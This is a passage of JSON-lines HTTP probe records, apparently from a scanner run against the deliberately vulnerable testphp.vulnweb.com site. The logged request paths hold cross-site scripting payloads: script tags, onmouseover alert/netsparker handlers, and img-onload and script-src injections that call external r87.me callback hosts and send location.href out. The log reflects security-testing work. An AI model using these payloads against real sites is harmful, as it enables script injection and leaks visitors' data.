Example\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/?pp='%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%20src%3d%22%2f%2fmv9e8mbvffulk1i0duvujvkdkktmkntnztbb8kejrja%26%2346%3br87%26%2346%3bme%22%3E%3C%2fscRipt%3E\",\"time\":\"352.085914ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":14,\"lines\":6,\"status_code\":200,\"content_length\":745,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:18.121329979Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/?pp=12\",\"input\":\"http://testphp.vulnweb.com/hpp/?pp=12\",\"title\":\"HTTP Parameter Pollution Example\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/?pp=12\",\"time\":\"348.778995ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":12,\"lines\":6,\"status_code\":200,\"content_length\":383,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:19.750622823Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/?pp=12A01\",\"input\":\"http://testphp.vulnweb.com/hpp/?pp=12A01\",\"title\":\"HTTP Parameter Pollution Example\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/?pp=12A01\",\"time\":\"340.623645ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":12,\"lines\":6,\"status_code\":200,\"content_length\":392,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:20.837354675Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/?pp=12Connection:\",\"input\":\"http://testphp.vulnweb.com/hpp/?pp=12Connection:\",\"title\":\"HTTP Parameter Pollution Example\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/?pp=12Connection:\",\"time\":\"338.361681ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":12,\"lines\":6,\"status_code\":200,\"content_length\":418,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:21.11174144Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/?pp=12User-Agent:\",\"input\":\"http://testphp.vulnweb.com/hpp/?pp=12User-Agent:\",\"title\":\"HTTP Parameter Pollution Example\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/?pp=12User-Agent:\",\"time\":\"339.335646ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":12,\"lines\":6,\"status_code\":200,\"content_length\":418,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:21.413986286Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/?pp=aaa%22bbb\",\"input\":\"http://testphp.vulnweb.com/hpp/?pp=aaa%22bbb\",\"title\":\"HTTP Parameter Pollution Example\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/?pp=aaa%22bbb\",\"time\":\"348.566407ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":12,\"lines\":6,\"status_code\":200,\"content_length\":400,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:22.1746257Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseove\",\"input\":\"http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseove\",\"title\":\"HTTP Parameter Pollution Example\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/?pp=x%22%20onmouseove\",\"time\":\"339.607178ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":14,\"lines\":6,\"status_code\":200,\"content_length\":418,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:22.186511802Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dalert(0x106ED2\",\"input\":\"http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dalert(0x106ED2\",\"title\":\"HTTP Parameter Pollution Example\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/?pp=x%22%20onmouseover%3dalert(0x106ED2\",\"time\":\"343.103241ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":14,\"lines\":6,\"status_code\":200,\"content_length\":470,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:22.268137409Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dalert(0x106ED2)%20x%3d%22\",\"input\":\"http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dalert(0x106ED2)%20x%3d%22\",\"title\":\"HTTP Parameter Pollution Example\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/?pp=x%22%20onmouseover%3dalert(0x106ED2)%20x%3d%22\",\"time\":\"350.532477ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":6,\"status_code\":200,\"content_length\":491,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:22.295685673Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dnetsparker(0x00333D\",\"input\":\"http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dnetsparker(0x00333D\",\"title\":\"HTTP Parameter Pollution Example\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/?pp=x%22%20onmouseover%3dnetsparker(0x00333D\",\"time\":\"355.796443ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":14,\"lines\":6,\"status_code\":200,\"content_length\":485,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:22.317513095Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dnetsparker(0x00333D)%20x%3d%22\",\"input\":\"http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dnetsparker(0x00333D)%20x%3d%22\",\"title\":\"HTTP Parameter Pollution Example\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/?pp=x%22%20onmouseover%3dnetsparker(0x00333D)%20x%3d%22\",\"time\":\"347.18767ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":6,\"status_code\":200,\"content_length\":506,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:22.541851979Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dnetsparker(0x106ED2\",\"input\":\"http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dnetsparker(0x106ED2\",\"title\":\"HTTP Parameter Pollution Example\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/?pp=x%22%20onmouseover%3dnetsparker(0x106ED2\",\"time\":\"354.52671ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":14,\"lines\":6,\"status_code\":200,\"content_length\":485,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:22.638243381Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/A01\",\"input\":\"http://testphp.vulnweb.com/hpp/A01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/A01\",\"time\":\"352.389587ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:22.715903479Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/User-Agent:\",\"input\":\"http://testphp.vulnweb.com/hpp/User-Agent:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/User-Agent:\",\"time\":\"352.448706ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:22.721767358Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php9\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php9\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php9\",\"time\":\"338.396755ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:22.776671856Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php9H\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php9H\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php9H\",\"time\":\"348.636222ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:22.82541607Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f\\u0026p=%25\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=\\u0026p=%25\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f\\u0026p=%25\",\"time\":\"360.420442ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":1,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:22.981802767Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f\\u0026p=%3CscRipt%3Ealert(0x107E91\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=\\u0026p=%3CscRipt%3Ealert(0x107E91\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f\\u0026p=%3CscRipt%3Ealert(0x107E91\",\"time\":\"355.768638ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":22,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:23.067034262Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f\\u0026p=%3CscRipt%3Enetsparker(0x0\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=\\u0026p=%3CscRipt%3Enetsparker(0x0\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f\\u0026p=%3CscRipt%3Enetsparker(0x0\",\"time\":\"346.61513ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":22,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:23.070139233Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f\\u0026p=%3CscRipt%3Ealert(0x107E91)%3C%2fscRipt%3E\\u0026pp=12\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=\\u0026p=%3CscRipt%3Ealert(0x107E91)%3C%2fscRipt%3E\\u0026pp=12\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f\\u0026p=%3CscRipt%3Ealert(0x107E91)%3C%2fscRipt%3E\\u0026pp=12\",\"time\":\"356.829454ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":34,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:23.128180574Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f\\u0026p=%3CscRipt%3Enetsparker(0x004FC3\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=\\u0026p=%3CscRipt%3Enetsparker(0x004FC3\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f\\u0026p=%3CscRipt%3Enetsparker(0x004FC3\",\"time\":\"351.053956ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:23.30682936Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f\\u0026p=%3CscRipt%3Enetsparker(0x004FC3)%3C%2fscRipt%3E\\u0026pp=12\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=\\u0026p=%3CscRipt%3Enetsparker(0x004FC3)%3C%2fscRipt%3E\\u0026pp=12\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f\\u0026p=%3CscRipt%3Enetsparker(0x004FC3)%3C%2fscRipt%3E\\u0026pp=12\",\"time\":\"339.021244ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":39,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:26.573204178Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f\\u0026p=%3CscRipt%3Enetsparker(0x1\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=\\u0026p=%3CscRipt%3Enetsparker(0x1\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f\\u0026p=%3CscRipt%3Enetsparker(0x1\",\"time\":\"356.709445ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":22,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:26.670718711Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f\\u0026p=%3CscRipt%3Enetsparker(0x107E91\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=\\u0026p=%3CscRipt%3Enetsparker(0x107E91\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f\\u0026p=%3CscRipt%3Enetsparker(0x107E91\",\"time\":\"356.161204ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:26.758676426Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f\\u0026p=N3tSp4rK3R\\u0026pp=12\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=\\u0026p=N3tSp4rK3R\\u0026pp=12\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f\\u0026p=N3tSp4rK3R\\u0026pp=12\",\"time\":\"351.526646ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":12,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:26.809774483Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f\\u0026p=val\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=\\u0026p=val\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f\\u0026p=val\",\"time\":\"356.197259ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":3,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:27.178803862Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f\\u0026p=valid\\u0026pp=%3CiMg%20src%253\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=\\u0026p=valid\\u0026pp=%3CiMg%20src%253\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f\\u0026p=valid\\u0026pp=%3CiMg%20src%253\",\"time\":\"352.813191ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2,\"lines\":1,\"status_code\":200,\"content_length\":15,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:27.513287857Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f\\u0026p=valid\\u0026pp=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d''%3bthis.src%3d'%2f%2fmv9e8mbvfflt-5t3c4td9zm1_axokh_ruxslkabx'%2b'ww4.r87.me%2fr%2f%3f'%2blocation.href%22%3E\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=\\u0026p=valid\\u0026pp=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d''%3bthis.src%3d'%2f%2fmv9e8mbvfflt-5t3c4td9zm1_axokh_ruxslkabx'%2b'ww4.r87.me%2fr%2f%3f'%2blocation.href%22%3E\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f\\u0026p=valid\\u0026pp=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d''%3bthis.src%3d'%2f%2fmv9e8mbvfflt-5t3c4td9zm1_axokh_ruxslkabx'%2b'ww4.r87.me%2fr%2f%3f'%2blocation.href%22%3E\",\"time\":\"344.269637ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":1,\"status_code\":200,\"content_length\":147,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:27.541261284Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f\\u0026p=valid\\u0026pp=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d''%3bthis.src%3d'%2f%2fmv9e8mbvfflt-5t3c4td9zm1_axokh_ruxslkabx'%2b'ww4.r87.me%2fr%2f%3f'%2blocation.href%22%3ECONFIRMED\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=\\u0026p=valid\\u0026pp=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d''%3bthis.src%3d'%2f%2fmv9e8mbvfflt-5t3c4td9zm1_axokh_ruxslkabx'%2b'ww4.r87.me%2fr%2f%3f'%2blocation.href%22%3ECONFIRMED\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f\\u0026p=valid\\u0026pp=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d''%3bthis.src%3d'%2f%2fmv9e8mbvfflt-5t3c4td9zm1_axokh_ruxslkabx'%2b'ww4.r87.me%2fr%2f%3f'%2blocation.href%22%3ECONFIRMED\",\"time\":\"355.357475ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":1,\"status_code\":200,\"content_length\":156,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:27.784599669Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f\\u0026p=valid\\u0026pp=%3CscRipt%3Ealert(0x107FBD\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=\\u0026p=valid\\u0026pp=%3CscRipt%3Ealert(0x107FBD\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f\\u0026p=valid\\u0026pp=%3CscRipt%3Ealert(0x107FBD\",\"time\":\"356.552151ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:28.315664802Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f\\u0026p=valid\\u0026pp=%3CscRipt%3Ealert(0x107FBD)%3C%2fscRipt%253\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=\\u0026p=valid\\u0026pp=%3CscRipt%3Ealert(0x107FBD)%3C%2fscRipt%253\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f\\u0026p=valid\\u0026pp=%3CscRipt%3Ealert(0x107FBD)%3C%2fscRipt%253\",\"time\":\"346.799959ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":38,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:28.475879254Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f\\u0026p=valid\\u0026pp=%3CscRipt%3Ealert(0x107FBD)%3C%2fscRipt%3E\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=\\u0026p=valid\\u0026pp=%3CscRipt%3Ealert(0x107FBD)%3C%2fscRipt%3E\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f\\u0026p=valid\\u0026pp=%3CscRipt%3Ealert(0x107FBD)%3C%2fscRipt%3E\",\"time\":\"352.558733ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":37,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:30.097215082Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f\\u0026p=valid\\u0026pp=%3CscRipt%3Enets\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=\\u0026p=valid\\u0026pp=%3CscRipt%3Enets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f\\u0026p=valid\\u0026pp=%3CscRipt%3Enets\",\"time\":\"344.565724ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubu